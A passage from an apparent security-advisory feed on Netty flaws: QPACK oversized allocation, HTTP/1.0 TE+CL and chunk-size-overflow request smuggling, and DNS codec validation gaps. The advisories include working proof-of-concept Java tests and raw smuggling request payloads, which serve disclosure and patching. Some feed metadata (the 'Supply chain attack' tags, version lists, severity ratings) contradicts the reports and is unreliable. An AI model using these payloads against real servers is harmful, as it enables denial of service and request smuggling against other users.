        workerGroup.shutdownGracefully();
    }
}
```

### Impact

Untrusted senders can stress memory with many small requests when no per-channel or aggregate limits are in place.
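The missing bound can be sketched as a check on the claimed size before any allocation happens. This is an illustrative helper under an assumed configurable cap, not the actual Netty fix:

```java
// Hedged sketch of the bound the decoder lacks: validate the header's claimed
// decompressed length against a configured cap before allocating for it.
// Class and method names are illustrative, not Netty API.
final class Lz4BlockCheck {
    static void checkClaimedLength(int decompressedLength, int maxAllowed) {
        if (decompressedLength < 0 || decompressedLength > maxAllowed) {
            throw new IllegalArgumentException(
                    "claimed decompressed length " + decompressedLength
                    + " exceeds limit " + maxAllowed);
        }
    }
}
```

With a cap like this applied before `ctx.alloc().buffer(...)`, the 22-byte frame claiming a `1 << 25` byte output fails fast instead of triggering a 32 MB allocation per connection.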

Affected versions

4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5, 4.2.0.Beta1, 4.2.0.Final

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

High
📦 io.netty:netty-codec-http3 📌 4.2.10.Final, 4.2.11.Final, 4.2.12.Final, 4.2.2.Final, 4.2.3.Final ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary When Netty decodes HTTP/3 headers, it sometimes runs `new byte[length]` using a length from the wire before checking that many bytes are really there. A small malicious header can claim a huge length (on the order of a gigabyte). ### Details When decoding header bloc...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

### Summary

When Netty decodes HTTP/3 headers, it sometimes runs `new byte[length]` using a length from the wire before checking that many bytes are really there. A small malicious header can claim a huge length (on the order of a gigabyte).

### Details

When decoding header blocks, the non-Huffman branch of `io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral` may execute `new byte[length]` for a string literal before verifying that `length` bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that `length <= in.readableBytes()` before `new byte[length]`.

### PoC

The test below constructs a small HTTP/3 HEADERS frame whose QPACK section decodes to a ~1 GiB non-Huffman name length and is used to observe server-side failure; it illustrates how little wire data can target `new byte[length]`.

```java
@Test
public void test() throws Exception {
    EventLoopGroup group = new MultiThreadIoEventLoopGroup(1, NioIoHandler.newFactory());
    try {
        X509Bundle cert = new CertificateBuilder()
                .subject("cn=localhost")
                .setIsCertificateAuthority(true)
                .buildSelfSigned();
        QuicSslContext serverContext =
                QuicSslContextBuilder.forServer(cert.toTempPrivateKeyPem(), null, cert.toTempCertChainPem())
                        .applicationProtocols(Http3.supportedApplicationProtocols())
                        .build();
        AtomicReference<Throwable> serverErrors = new AtomicReference<>();
        CountDownLatch serverConnectionClosed = new CountDownLatch(1);
        ChannelHandler serverCodec = Http3.newQuicServerCodecBuilder()
                .sslContext(serverContext)
                .maxIdleTimeout(5000, TimeUnit.MILLISECONDS)
                .initialMaxData(10_000_000)
                .initialMaxStreamDataBidirectionalLocal(1_000_000)
                .initialMaxStreamDataBidirectionalRemote(1_000_000)
                .initialMaxStreamsBidirectional(100)
                .tokenHandler(InsecureQuicTokenHandler.INSTANCE)
                .handler(new ChannelInitializer<QuicChannel>() {
                    @Override
                    protected void initChannel(QuicChannel ch) {
                        ch.closeFuture().addListener(f -> serverConnectionClosed.countDown());
                        ch.pipeline().addLast(new Http3ServerConnectionHandler(
                                new ChannelInboundHandlerAdapter() {
                                    @Override
                                    public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
                                        if (cause instanceof DecoderException) {
                                            serverErrors.set(cause.getCause());
                                        } else {
                                            serverErrors.set(cause);
                                        }
                                    }
                                }));
                    }
                })
                .build();
        Channel server = new Bootstrap()
                .group(group)
                .channel(NioDatagramChannel.class)
                .handler(serverCodec)
                .bind("127.0.0.1", 0)
                .sync()
                .channel();

        QuicSslContext clientContext = QuicSslContextBuilder.forClient()
                .trustManager(InsecureTrustManagerFactory.INSTANCE)
                .applicationProtocols(Http3.supportedApplicationProtocols())
                .build();
        ChannelHandler clientCodec = Http3.newQuicClientCodecBuilder()
                .sslContext(clientContext)
                .maxIdleTimeout(5000, TimeUnit.MILLISECONDS)
                .initialMaxData(10_000_000)
                .initialMaxStreamDataBidirectionalLocal(1_000_000)
                .build();
        Channel client = new Bootstrap()
                .group(group)
                .channel(NioDatagramChannel.class)
                .handler(clientCodec)
                .bind(0)
                .sync()
                .channel();
        QuicChannel quicChannel = QuicChannel.newBootstrap(client)
                .handler(new Http3ClientConnectionHandler())
                .remoteAddress(server.localAddress())
                .localAddress(client.localAddress())
                .connect()
                .get();
        QuicStreamChannel rawStream = quicChannel.createStream(QuicStreamType.BIDIRECTIONAL,
                new ChannelInboundHandlerAdapter()).get();

        ByteBuf header = Unpooled.buffer();
        header.writeByte(0x01);
        header.writeByte(0x08);
        header.writeByte(0x00);
        header.writeByte(0x00);
        header.writeByte(0x27);
        header.writeByte(0x80);
        header.writeByte(0x80);
        header.writeByte(0x80);
        header.writeByte(0x80);
        header.writeByte(0x04);
        rawStream.writeAndFlush(header).sync();

        assertTrue(serverConnectionClosed.await(10, TimeUnit.SECONDS));
        assertInstanceOf(IndexOutOfBoundsException.class, serverErrors.get());
        quicChannel.closeFuture().await(5, TimeUnit.SECONDS);
        server.close().sync();
        client.close().sync();
    } finally {
        group.shutdownGracefully();
    }
}
```

### Impact

The server can slow down, stall, or crash under load when many crafted HTTP/3 HEADERS frames trigger very large `byte[]` allocations during QPACK literal decoding.
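The "~1 GiB from a few bytes" claim can be reproduced with the QPACK/HPACK prefix-integer encoding (RFC 7541 §5.1). A self-contained sketch of that decoding, not Netty's decoder, applied to the PoC's header bytes:

```java
// Sketch of HPACK/QPACK prefix-integer decoding (RFC 7541 §5.1), applied to
// the PoC bytes 0x27 0x80 0x80 0x80 0x80 0x04 with a 3-bit length prefix.
// Shows how 6 bytes of wire data express a ~1 GiB string-literal length.
final class PrefixInt {
    static long decode(byte[] in, int prefixBits) {
        int mask = (1 << prefixBits) - 1;
        long value = in[0] & mask;
        if (value < mask) {
            return value; // fits entirely in the prefix, no continuation bytes
        }
        int shift = 0;
        for (int i = 1; i < in.length; i++) {
            value += (long) (in[i] & 0x7F) << shift;
            shift += 7;
            if ((in[i] & 0x80) == 0) {
                break; // a clear high bit terminates the varint
            }
        }
        return value;
    }
}
```

Decoding `{0x27, 0x80, 0x80, 0x80, 0x80, 0x04}` with a 3-bit prefix yields 1,073,741,831, just over 1 GiB, and that value flows into `new byte[length]` before any readability check.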

Affected versions

4.2.10.Final, 4.2.11.Final, 4.2.12.Final, 4.2.2.Final, 4.2.3.Final

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Unspecified
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 # NETTY HTTP/1.0 TE+CL Coexistence Bypasses Smuggling Sanitization | Field | Value | |-----------|-------| | Library | `io.netty:netty-codec-http` | | Component | `codec-http` — `HttpObjectDecoder` | | Severity | **HIGH** | | Affects | HEAD, commit `4f3533ae` confirmed ...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

# NETTY HTTP/1.0 TE+CL Coexistence Bypasses Smuggling Sanitization

| Field | Value |
|-----------|-------|
| Library | `io.netty:netty-codec-http` |
| Component | `codec-http` — `HttpObjectDecoder` |
| Severity | **HIGH** |
| Affects | HEAD, commit `4f3533ae` confirmed |

---

## Summary

`HttpObjectDecoder` strips a conflicting `Content-Length` header when a request carries both `Transfer-Encoding: chunked` and `Content-Length`, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker who sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving `Content-Length` intact in the forwarded `HttpMessage`. Any downstream proxy or handler that trusts `Content-Length` over `Transfer-Encoding` will disagree on message boundaries, enabling request smuggling.

---

## Root Cause

```java
// HttpObjectDecoder.java:828-833
if (HttpUtil.isTransferEncodingChunked(message)) {
    this.chunked = true;
    if (!contentLengthFields.isEmpty() &&
            message.protocolVersion() == HttpVersion.HTTP_1_1) {
        handleTransferEncodingChunkedWithContentLength(message); // strips CL — HTTP/1.1 only
    }
    return State.READ_CHUNK_SIZE;
}

// HttpObjectDecoder.java:870-873
protected void handleTransferEncodingChunkedWithContentLength(HttpMessage message) {
    message.headers().remove(HttpHeaderNames.CONTENT_LENGTH);
    contentLength = Long.MIN_VALUE;
}
```

The conflict-resolution path is gated on `message.protocolVersion() == HttpVersion.HTTP_1_1`. When the request declares `HTTP/1.0`, the condition is false, `handleTransferEncodingChunkedWithContentLength` is never called, and the `Content-Length` header survives into the forwarded message. Netty still processes the body as chunked; a downstream component that is CL-first interprets the same bytes as a separate request.

---

## Proof of Concept

```
POST /api HTTP/1.0\r\n
Host: internal.example.com\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 0\r\n
\r\n
5\r\n
GPOST\r\n
0\r\n
\r\n
```

Netty consumes the full chunked body (5 bytes + terminator). A downstream CL-first proxy reads `Content-Length: 0`, considers the request complete at the blank line, and treats `5\r\nGPOST\r\n0\r\n\r\n` as the start of a second request.

---

## Conditions Required

1. Netty is deployed behind a reverse proxy or load balancer that is `Content-Length`-first (nginx, some HAProxy configs, AWS ALB in certain modes).
2. Attacker can send HTTP/1.0 requests (either directly or by downgrading via connection manipulation).
3. No additional HTTP/1.0 stripping layer between attacker and Netty.

---

## Impact

Request smuggling at the Netty edge. Allows cache poisoning, session fixation against other users, unauthorized access to internal endpoints, and bypassing of WAF or authentication layers that inspect only the first logical request.

---

## Confirmed PoC Test

Verified against HEAD (`4f3533ae`) using `EmbeddedChannel`. Both tests pass, confirming the vulnerability and the HTTP/1.1 contrast.

```java
package io.netty.handler.codec.http;

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.util.CharsetUtil;
import org.junit.jupiter.api.Test;

import static org.junit.jupiter.api.Assertions.*;

public class NettySmugglingSec001Test {

    // VULNERABLE: Content-Length survives in HTTP/1.0 TE+CL conflict
    @Test
    public void http10_contentLengthNotStripped() {
        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder());
        ch.writeInbound(Unpooled.copiedBuffer(
                "POST /api HTTP/1.0\r\n" +
                "Transfer-Encoding: chunked\r\n" +
                "Content-Length: 0\r\n" +
                "\r\n" +
                "5\r\nGPOST\r\n0\r\n\r\n", CharsetUtil.US_ASCII));
        HttpRequest req = ch.readInbound();
        assertEquals(HttpVersion.HTTP_1_0, req.protocolVersion());
        // Content-Length: 0 survives — downstream CL-first proxy treats chunked body as new request
        assertNotNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH),
                "VULNERABLE: CL not stripped");
        ch.finishAndReleaseAll();
    }

    // SAFE: HTTP/1.1 correctly strips Content-Length on TE+CL conflict
    @Test
    public void http11_contentLengthStripped() {
        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestDecoder());
        ch.writeInbound(Unpooled.copiedBuffer(
                "POST /api HTTP/1.1\r\n" +
                "Transfer-Encoding: chunked\r\n" +
                "Content-Length: 0\r\n" +
                "\r\n" +
                "5\r\nGPOST\r\n0\r\n\r\n", CharsetUtil.US_ASCII));
        HttpRequest req = ch.readInbound();
        assertNull(req.headers().get(HttpHeaderNames.CONTENT_LENGTH),
                "SAFE: CL correctly stripped");
        ch.finishAndReleaseAll();
    }
}
```

---

## Fix Guidance

Remove the `message.protocolVersion() == HttpVersion.HTTP_1_1` guard in `HttpObjectDecoder`, applying `handleTransferEncodingChunkedWithContentLength` unconditionally whenever both `Transfer-Encoding: chunked` and `Content-Length` are present, regardless of protocol version.
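The fix direction named above, dropping the protocol-version gate, can be sketched as a header-level rule. This is an illustrative helper over a plain `Map`, not the actual patch to `HttpObjectDecoder`:

```java
import java.util.Map;

// Illustrative sketch of the fix guidance above: on a TE:chunked + CL
// conflict, drop Content-Length for every protocol version, not just
// HTTP/1.1. A plain Map stands in for Netty's HttpHeaders; all names
// here are hypothetical.
final class TeClConflict {
    static void resolve(Map<String, String> headers) {
        String te = headers.get("transfer-encoding");
        if (te != null && te.toLowerCase().contains("chunked")) {
            // Applied regardless of HTTP/1.0 vs HTTP/1.1, so a CL-first
            // downstream can no longer disagree on message boundaries.
            headers.remove("content-length");
        }
    }
}
```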

Affected Versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Unspecified
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 Supply-chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary Netty's chunk size parser silently overflows int, enabling request smuggling attacks. ### Details io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int. The size is accumulated as follows: result *= 16; result += digit; The result is ch...
📅 2026-05-07 OSV/Maven 🔗 Details

Full Description

### Summary

Netty's chunk size parser silently overflows `int`, enabling request smuggling attacks.

### Details

`io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize` silently overflows `int`. The size is accumulated as follows:

```java
result *= 16;
result += digit;
```

The result is checked only for negative values. However, with a carefully crafted chunk size, the result can still be a valid (small, positive) size.

### PoC

The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body.

```java
@Test
public void test() {
    String requestStr = "POST / HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Transfer-Encoding: chunked\r\n\r\n" +
            "100000004\r\n" +
            "test\r\n" +
            "0\r\n" +
            "\r\n" +
            "GET /smuggled HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Content-Length: 0\r\n" +
            "\r\n";
    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

    // Request 1
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    HttpContent content = channel.readInbound();
    assertTrue(content.decoderResult().isSuccess());
    assertEquals("test", content.content().toString(CharsetUtil.US_ASCII));
    content.release();
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
}
```

### Impact

HTTP Request Smuggling: an attacker can inject arbitrary HTTP requests.
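The overflow can be reproduced in isolation. The sketch below is illustrative (not Netty's actual parser): it mirrors the `result *= 16; result += digit;` accumulation and shows that the hex chunk size `100000004` wraps to the small positive value 4 in 32-bit arithmetic, slipping past a negative-value check.

```java
public class ChunkSizeOverflowDemo {
    // Mirrors the vulnerable accumulation pattern: only negative results are rejected.
    static int parseHexChunkSize(String hex) {
        int result = 0;
        for (int i = 0; i < hex.length(); i++) {
            int digit = Character.digit(hex.charAt(i), 16);
            result *= 16;   // silently overflows int
            result += digit;
        }
        if (result < 0) {
            throw new IllegalArgumentException("negative chunk size");
        }
        return result;
    }

    public static void main(String[] args) {
        // 0x100000004 = 4294967300 does not fit in 32 bits; the low word is 4,
        // so the parser reads only 4 body bytes ("test") and the remaining
        // payload is interpreted as the start of a new request.
        System.out.println(parseHexChunkSize("100000004")); // prints 4
        System.out.println(Long.parseLong("100000004", 16)); // prints 4294967300
    }
}
```

This is why the `100000004` chunk header in the PoC above yields a 4-byte body (`test`) followed by the smuggled `GET /smuggled` request.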

Affected Versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

High
📦 io.netty:netty-codec-dns 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 Supply-chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 # Security Vulnerability Report: DNS Codec Input Validation Bypass in Netty (Encoder + Decoder) ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-dns) | | **Component** | `io.n...
📅 2026-05-07 OSV/Maven 🔗 Details

Full Description

# Security Vulnerability Report: DNS Codec Input Validation Bypass in Netty (Encoder + Decoder)

## 1. Vulnerability Summary

| Field | Value |
|-------|-------|
| **Product** | Netty |
| **Version** | 4.2.12.Final (and all prior versions with codec-dns) |
| **Component** | `io.netty.handler.codec.dns.DnsCodecUtil` |
| **Vulnerability Type** | CWE-20: Improper Input Validation / CWE-626: Null Byte Interaction Error / CWE-400: Uncontrolled Resource Consumption |
| **Impact** | DNS Cache Poisoning / Domain Validation Bypass / Denial of Service / Malformed DNS Packets |

## 2. Affected Components

Both the encoder and decoder in the same file are affected:

- `io.netty.handler.codec.dns.DnsCodecUtil` — `encodeDomainName()` method (lines 31-51):
  - No null byte validation in domain name labels
  - No per-label length validation (RFC 1035 max: 63 bytes)
  - No total domain name length validation (RFC 1035 max: 255 bytes)
  - Empty labels silently truncate the domain name
- `io.netty.handler.codec.dns.DnsCodecUtil` — `decodeDomainName()` method (lines 53-118):
  - No per-label length validation (max 63)
  - No total domain name length validation (max 255)
  - Unbounded StringBuilder growth from attacker-controlled DNS responses

## 3. Vulnerability Description

Netty's DNS codec does **not enforce RFC 1035 domain name constraints** during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder.

### 3.1 Encoder Side — Null Byte Injection (CWE-626)

A domain name containing a null byte (e.g., `"evil\0.example.com"`) is encoded with the null byte embedded in the label data. This creates a domain name that different DNS implementations interpret differently:

- **Java (full string)**: sees `"evil\0.example.com"` as a single label containing a null
- **C/native DNS libraries**: truncate at the null byte, seeing only `"evil"`
- **DNS servers**: may accept or reject based on implementation

This differential interpretation enables **DNS cache poisoning** and **domain validation bypass**.

### 3.2 Encoder Side — Overlength Label (RFC 1035 Violation)

Labels exceeding 63 bytes are accepted by the encoder. The length byte is written as a single unsigned byte, so a 200-byte label writes `0xC8` (200) as the length. Per RFC 1035, values 192-255 indicate **compression pointers**. This means:

- A 200-byte label length `0xC8` would be interpreted as a **compression pointer** by standards-compliant DNS parsers
- This creates **parser confusion** between label and pointer interpretation

### 3.3 Encoder Side — Silent Truncation via Empty Labels

```java
encodeDomainName("a..b.com", buf);
// Encodes as: [01] 'a' [00]
// Only "a." is encoded, ".b.com" is silently dropped!
```

An attacker can craft input like `"safe-domain..evil.com"` which gets truncated to just `"safe-domain."`, potentially bypassing domain allowlists.

### 3.4 Decoder Side — Unbounded Memory Allocation

The decoder accepts labels of any length (0-255 bytes) without checking the RFC 1035 per-label limit of 63 bytes or the total domain name limit of 255 bytes. A malicious DNS server can return responses with oversized labels, causing excessive memory allocation.

### Root Cause — Encoder

```java
// DnsCodecUtil.java:31-51
static void encodeDomainName(String name, ByteBuf buf) {
    if (ROOT.equals(name)) {
        buf.writeByte(0);
        return;
    }
    final String[] labels = name.split("\\.");
    for (String label : labels) {
        final int labelLen = label.length();
        if (labelLen == 0) {
            break; // NO ERROR - silently truncates!
        }
        // NO check: labelLen > 63
        // NO check: label contains null bytes
        // NO check: total name > 255 bytes
        buf.writeByte(labelLen);            // Can write values > 63!
        ByteBufUtil.writeAscii(buf, label); // Null bytes pass through!
    }
    buf.writeByte(0);
}
```

### Root Cause — Decoder

```java
// DnsCodecUtil.java:94-99 (decodeDomainName)
} else if (len != 0) {
    if (!in.isReadable(len)) { // Only checks if bytes EXIST, not if len <= 63
        throw new CorruptedFrameException("truncated label in a name");
    }
    name.append(in.toString(in.readerIndex(), len, CharsetUtil.UTF_8)).append('.');
    // ^^^^^^ StringBuilder grows WITHOUT any length limit
    in.skipBytes(len);
}
```

**Missing checks in decoder**:

- No `if (len > 63)` check per RFC 1035 Section 2.3.4
- No `if (name.length() > 255)` check for total domain name length

## 4. Exploitability Prerequisites

### Encoder Side (outbound)

1. An application constructs DNS queries using Netty's DNS codec with user-influenced domain names
2. The constructed DNS packets are sent to DNS servers or resolvers

### Decoder Side (inbound)

1. An application uses Netty's `codec-dns` or `resolver-dns` module to process DNS responses
2. The application communicates with a malicious or compromised DNS server

**Attack surface**: Any Netty application using DNS resolution (`DnsNameResolver`) is potentially affected on the decoder side, as DNS responses from the network are attacker-controlled. The encoder side requires user-controlled hostnames.

## 5. Attack Scenarios

### Scenario 1: DNS Cache Poisoning via Null Byte (Encoder)

```java
String hostname = userInput; // "evil\0.trusted.com"
DnsQuery query = new DefaultDnsQuery(...)
    .addRecord(DnsSection.QUESTION, new DefaultDnsQuestion(hostname, DnsRecordType.A));
```

The DNS query for `"evil\0.trusted.com"` may be interpreted by some resolvers as a query for `"evil"` (truncated at null). If the attacker controls the DNS for `"evil"`, they can return a response that gets cached for `"evil\0.trusted.com"` (or vice versa), poisoning the cache.

### Scenario 2: Label/Pointer Confusion (Encoder)

A 200-byte label writes length byte `0xC8`. Standards-compliant parsers interpret `0xC0-0xFF` as **compression pointer** prefixes (RFC 1035 Section 4.1.4). The resulting DNS packet is structurally ambiguous:

```
Byte: [C8] [61 61 61 ... (200 bytes)]
       ↑
Label interpretation:   200-byte label starting with 'a'
Pointer interpretation: pointer to offset 0x0861 = 2145
```

### Scenario 3: Memory Exhaustion via Large Labels (Decoder)

A malicious DNS server returns a response with a 255-byte label (RFC limit: 63). Netty decodes it without error, creating a 260+ character String. With compression pointers, a small DNS response can cause megabytes of StringBuilder allocation.

### Scenario 4: Domain Truncation via Empty Label (Encoder)

```java
encodeDomainName("safe-domain..evil.com", buf);
// Only "safe-domain." is encoded, "evil.com" silently dropped
```

This can bypass domain allowlists that check the input string.

### Scenario 5: Downstream Processing Failures (Decoder)

Applications that pass decoded domain names to other DNS libraries, certificate validators, or URL parsers may crash or behave incorrectly when receiving names > 255 bytes, as these systems typically assume RFC 1035 compliance.

## 6. Proof of Concept

### PoC 1: Encoder Null Byte and Overlength (DnsEncoderNullBytePoC.java)

```java
import io.netty.buffer.ByteBuf;
import io.netty.buffer.Unpooled;

import java.lang.reflect.Method;

public class DnsEncoderNullBytePoC {
    public static void main(String[] args) throws Exception {
        System.out.println("=== Netty DNS Encoder Validation Bypass PoC ===\n");
        Class<?> clazz = Class.forName("io.netty.handler.codec.dns.DnsCodecUtil");
        Method encode = clazz.getDeclaredMethod("encodeDomainName", String.class, ByteBuf.class);
        encode.setAccessible(true);

        // Test 1: Null byte in domain name
        ByteBuf buf = Unpooled.buffer(256);
        encode.invoke(null, "evil\0.example.com", buf);
        byte[] bytes = new byte[buf.readableBytes()];
        buf.readBytes(bytes);
        buf.release();
        System.out.print("[TEST 1] Null byte - Encoded: ");
        for (byte b : bytes) System.out.printf("%02x ", b & 0xff);
        System.out.println("\nVULNERABLE: Null byte 0x00 in label data!");

        // Test 2: 200-byte label
        ByteBuf buf2 = Unpooled.buffer(512);
        encode.invoke(null, "a".repeat(200) + ".com", buf2);
        System.out.println("\n[TEST 2] 200-byte label encoded: " + buf2.readableBytes() + " bytes");
        System.out.println("VULNERABLE: Overlength label accepted!");
        buf2.release();

        // Test 3: Empty label truncation
        ByteBuf buf3 = Unpooled.buffer(256);
        encode.invoke(null, "a..b.com", buf3);
        byte[] bytes3 = new byte[buf3.readableBytes()];
        buf3.readBytes(bytes3);
        buf3.release();
        System.out.print("\n[TEST 3] Empty label - Encoded: ");
        for (byte b : bytes3) System.out.printf("%02x ", b & 0xff);
        System.out.println("\nVULNERABLE: Domain silently truncated!");
    }
}
```

### PoC 2: Decoder Length Bypass (DnsDecoderLengthPoC.java)

```java
import io.netty.buffer.ByteBuf;
import io.netty.buffer.Unpooled;

import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;

public class DnsDecoderLengthPoC {
    public static void main(String[] args) throws Exception {
        System.out.println("=== Netty DNS Decoder Length Bypass PoC ===\n");
        Class<?> clazz = Class.forName("io.netty.handler.codec.dns.DnsCodecUtil");
        Method decode = clazz.getDeclaredMethod("decodeDomainName", ByteBuf.class);
        decode.setAccessible(true);

        // Test 1: 100-byte label (RFC limit: 63)
        ByteBuf buf1 = Unpooled.buffer(256);
        buf1.writeByte(100);
        buf1.writeBytes("a".repeat(100).getBytes(StandardCharsets.US_ASCII));
        buf1.writeByte(3);
        buf1.writeBytes("com".getBytes(StandardCharsets.US_ASCII));
        buf1.writeByte(0);
        String r1 = (String) decode.invoke(null, buf1);
        buf1.release();
        System.out.println("[TEST 1] 100-byte label: length=" + r1.length()
                + " VULNERABLE=" + (r1.length() > 64));

        // Test 2: 5 x 60-byte labels = 305 bytes (RFC limit: 255)
        ByteBuf buf2 = Unpooled.buffer(512);
        for (int i = 0; i < 5; i++) {
            buf2.writeByte(60);
            buf2.writeBytes(String.valueOf((char) ('a' + i)).repeat(60)
                    .getBytes(StandardCharsets.US_ASCII));
        }
        buf2.writeByte(0);
        String r2 = (String) decode.invoke(null, buf2);
        buf2.release();
        System.out.println("[TEST 2] 305-byte domain: length=" + r2.length()
                + " VULNERABLE=" + (r2.length() > 255));
    }
}
```

### How to Compile and Run

```bash
JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \
    | grep -v sources | grep -v javadoc | tr '\n' ':')

# Encoder PoC
javac -cp "$JARS" DnsEncoderNullBytePoC.java
java --add-opens java.base/java.lang=ALL-UNNAMED -cp "$JARS:." DnsEncoderNullBytePoC

# Decoder PoC
javac -cp "$JARS" DnsDecoderLengthPoC.java
java --add-opens java.base/java.lang=ALL-UNNAMED -cp "$JARS:." DnsDecoderLengthPoC
```

### PoC Execution Output (Verified on Netty 4.2.12.Final)

**Encoder PoC:**

```
=== Netty DNS Encoder Validation Bypass PoC ===

[TEST 1] Null byte in domain name
Input: "evil\0.example.com"
Encoded bytes: 05 65 76 69 6c 00 07 65 78 61 6d 70 6c 65 03 63 6f 6d 00
Null byte in label data: true
VULNERABLE: YES - Null byte accepted!

[TEST 2] Label > 63 bytes in encoder
Input: "aaaaaa..." (200-char label)
Encoded bytes: 206
VULNERABLE: YES - Overlength label accepted in encoder!

[TEST 3] Empty labels (consecutive dots)
Input: "a..b.com"
Encoded bytes: 01 61 00
Note: Empty label truncates the name (may lose data)
```

**Decoder PoC:**

```
=== Netty DNS Decoder Length Bypass PoC ===

[TEST 1] Label > 63 bytes (RFC 1035 violation)
Label length: 100 bytes (RFC limit: 63)
Decoded name length: 105
VULNERABLE: YES - Label > 63 bytes accepted!

[TEST 2] Domain > 255 bytes via multiple labels
5 labels x 60 bytes = 300+ bytes total
RFC 1035 limit: 255 bytes
Decoded name length: 305
VULNERABLE: YES - Domain > 255 bytes accepted!
```

## 7. Impact Analysis

| Impact Category | Description |
|----------------|-------------|
| **Integrity** | HIGH — Null byte injection causes differential interpretation across DNS implementations |
| **Availability** | HIGH — Malicious DNS responses can cause unbounded memory allocation via decoder |
| **DNS Cache Poisoning** | Different parsers see different domain names from the same encoded packet |
| **Domain Validation Bypass** | Null bytes can bypass allowlist/blocklist checks in DNS proxies |
| **Label/Pointer Confusion** | Length bytes > 63 conflict with RFC 1035 compression pointer encoding |
| **Silent Truncation** | Empty labels silently drop the remainder of the domain name |
| **Downstream Failures** | Oversized domain names may crash certificate validators, URL parsers, or other DNS-aware libraries |

## 8. Remediation Recommendations

### Fix for Encoder (encodeDomainName)

```java
static void encodeDomainName(String name, ByteBuf buf) {
    if (ROOT.equals(name)) {
        buf.writeByte(0);
        return;
    }
    int totalLength = 0;
    final String[] labels = name.split("\\.");
    for (String label : labels) {
        final int labelLen = label.length();
        if (labelLen == 0) {
            throw new IllegalArgumentException("DNS name contains empty label: " + name);
        }
        if (labelLen > 63) {
            throw new IllegalArgumentException(
                    "DNS label length " + labelLen + " exceeds maximum of 63: " + name);
        }
        for (int i = 0; i < label.length(); i++) {
            if (label.charAt(i) == '\0') {
                throw new IllegalArgumentException(
                        "DNS label contains null byte at index " + i);
            }
        }
        totalLength += 1 + labelLen;
        if (totalLength > 254) {
            throw new IllegalArgumentException(
                    "DNS name exceeds maximum length of 255: " + name);
        }
        buf.writeByte(labelLen);
        ByteBufUtil.writeAscii(buf, label);
    }
    buf.writeByte(0);
}
```

### Fix for Decoder (decodeDomainName)

```java
// Add after "} else if (len != 0) {":
if (len > 63) {
    throw new CorruptedFrameException("DNS label length " + len + " exceeds maximum of 63");
}

// Add after "name.append(...)":
if (name.length() > 255) {
    throw new CorruptedFrameException("DNS domain name length exceeds maximum of 255");
}
```

## 9. Resources

- [RFC 1035 Section 2.3.4: Size Limits](https://tools.ietf.org/html/rfc1035#section-2.3.4)
- [RFC 1035 Section 4.1.4: Message Compression](https://tools.ietf.org/html/rfc1035#section-4.1.4)
- [CWE-20: Improper Input Validation](https://cwe.mitre.org/data/definitions/20.html)
- [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html)
- [CWE-626: Null Byte Interaction Error](https://cwe.mitre.org/data/definitions/626.html)

Affected Versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Low
